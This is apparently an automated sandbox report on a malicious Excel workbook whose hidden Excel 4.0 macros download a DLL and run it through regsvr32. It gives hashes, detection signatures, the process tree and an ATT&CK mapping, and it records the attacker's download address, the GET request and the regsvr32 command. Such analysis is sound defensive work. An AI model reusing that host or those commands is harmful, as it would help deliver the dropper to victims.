
Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

 Sample Name: Total_order_data-V2434883.xlsb
 Analysis ID: 432263
 MD5: 3ee5986d7978a5f2df982fce2a3ebf93
 SHA1: 8f0e54b80cb391871d3cd1de6dd190ea686f0798
 SHA256: a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2

Detection

Hidden Macro 4.0
 Score: 80 Range: 0 - 100 Whitelisted: false Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

 System is w10x64
 EXCEL.EXE (PID: 3292, cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, MD5: 5D6638F2C8F8571C593999C58866007E)
   regsvr32.exe (PID: 5852, cmdline: regsvr32 -s ..\kdldyeff.dll, MD5: 426E7499F6A7346F0410DEAD0805586B)
     cmd.exe (PID: 5964, cmdline: C:\Windows\system32\cmd.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)

Malware Configuration

No configs have been found
Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | 

Sigma Overview

System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell
 Source: Process started
 Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
 Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3292, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 5852

Signature Overview

 Antivirus or Machine Learning detection for unpacked file
 Source: 2.2.regsvr32.exe.970000.2.unpack Avira: Label: TR/Dropper.Gen
 Source: 2.2.regsvr32.exe.8340f0.1.unpack Avira: Label: TR/Patched.Ren.Gen
 Uses new MSVCR Dlls

Software Vulnerabilities:

 Document exploit detected (creates forbidden files)
 Document exploit detected (drops PE files)
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: sat1_0609_2[1].dll.0.dr
 Document exploit detected (process start blacklist hit)
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
 Potential document exploit detected (performs HTTP gets)
 Source: global traffic TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
 Potential document exploit detected (unknown TCP traffic)
 Source: global traffic TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
 Date: Wed, 09 Jun 2021 21:54:41 GMT
 Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28
 Last-Modified: Wed, 09 Jun 2021 20:56:10 GMT
 ETag: "803e0-5c45b81110e80"
 Accept-Ranges: bytes
 Content-Length: 525280
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: application/octet-stream
 Data Raw: [hex dump of the response body omitted]
 Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1
 Accept: */*
 Accept-Encoding: gzip, deflate
 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
 Host: 185.180.199.121
 Connection: Keep-Alive
 Connects to IPs without corresponding DNS lookups
 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121
 URLs found in memory or binary data

System Summary:

 Found Excel 4.0 Macro with suspicious formulas
 Source: Total_order_data-V2434883.xlsb Initial sample: CALL
 Source: Total_order_data-V2434883.xlsb Initial sample: CALL
 Source: Total_order_data-V2434883.xlsb Initial sample: EXEC
 Office process drops PE file
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
 Abnormal high CPU Usage
 Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
 Tries to load missing DLLs
 Classification label
 Source: classification engine Classification label: mal80.expl.evad.winXLSB@5/10@0/1
 Creates files inside the user directory
 Creates temporary files
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.dat
 Spawns processes
 Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
 Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
 Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Document is a ZIP file with path names indicative of goodware
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image1.png
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image2.png
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image3.png
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image4.png
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image5.png
 Checks if Microsoft Office is installed
 Uses new MSVCR Dlls
 Registers a DLL
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret 2_2_00E02BFD
 Drops PE files
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
 Drops PE files to the user directory
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll

Boot Survival:

 Drops PE files to the user root directory
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
 Disables application error messages (SetErrorMode)
 Found dropped PE file which has not been started or loaded
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll
 Contains functionality to read the PEB
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_01170456 mov eax, dword ptr fs:[00000030h] 2_2_01170456
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0117095E mov eax, dword ptr fs:[00000030h] 2_2_0117095E
 Creates a process in suspended mode (likely to inject code)
 Yara detected Xls With Macro 4.0
 Source: Yara match File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection11 | Masquerading111 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution42 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Process Injection11 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol21 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact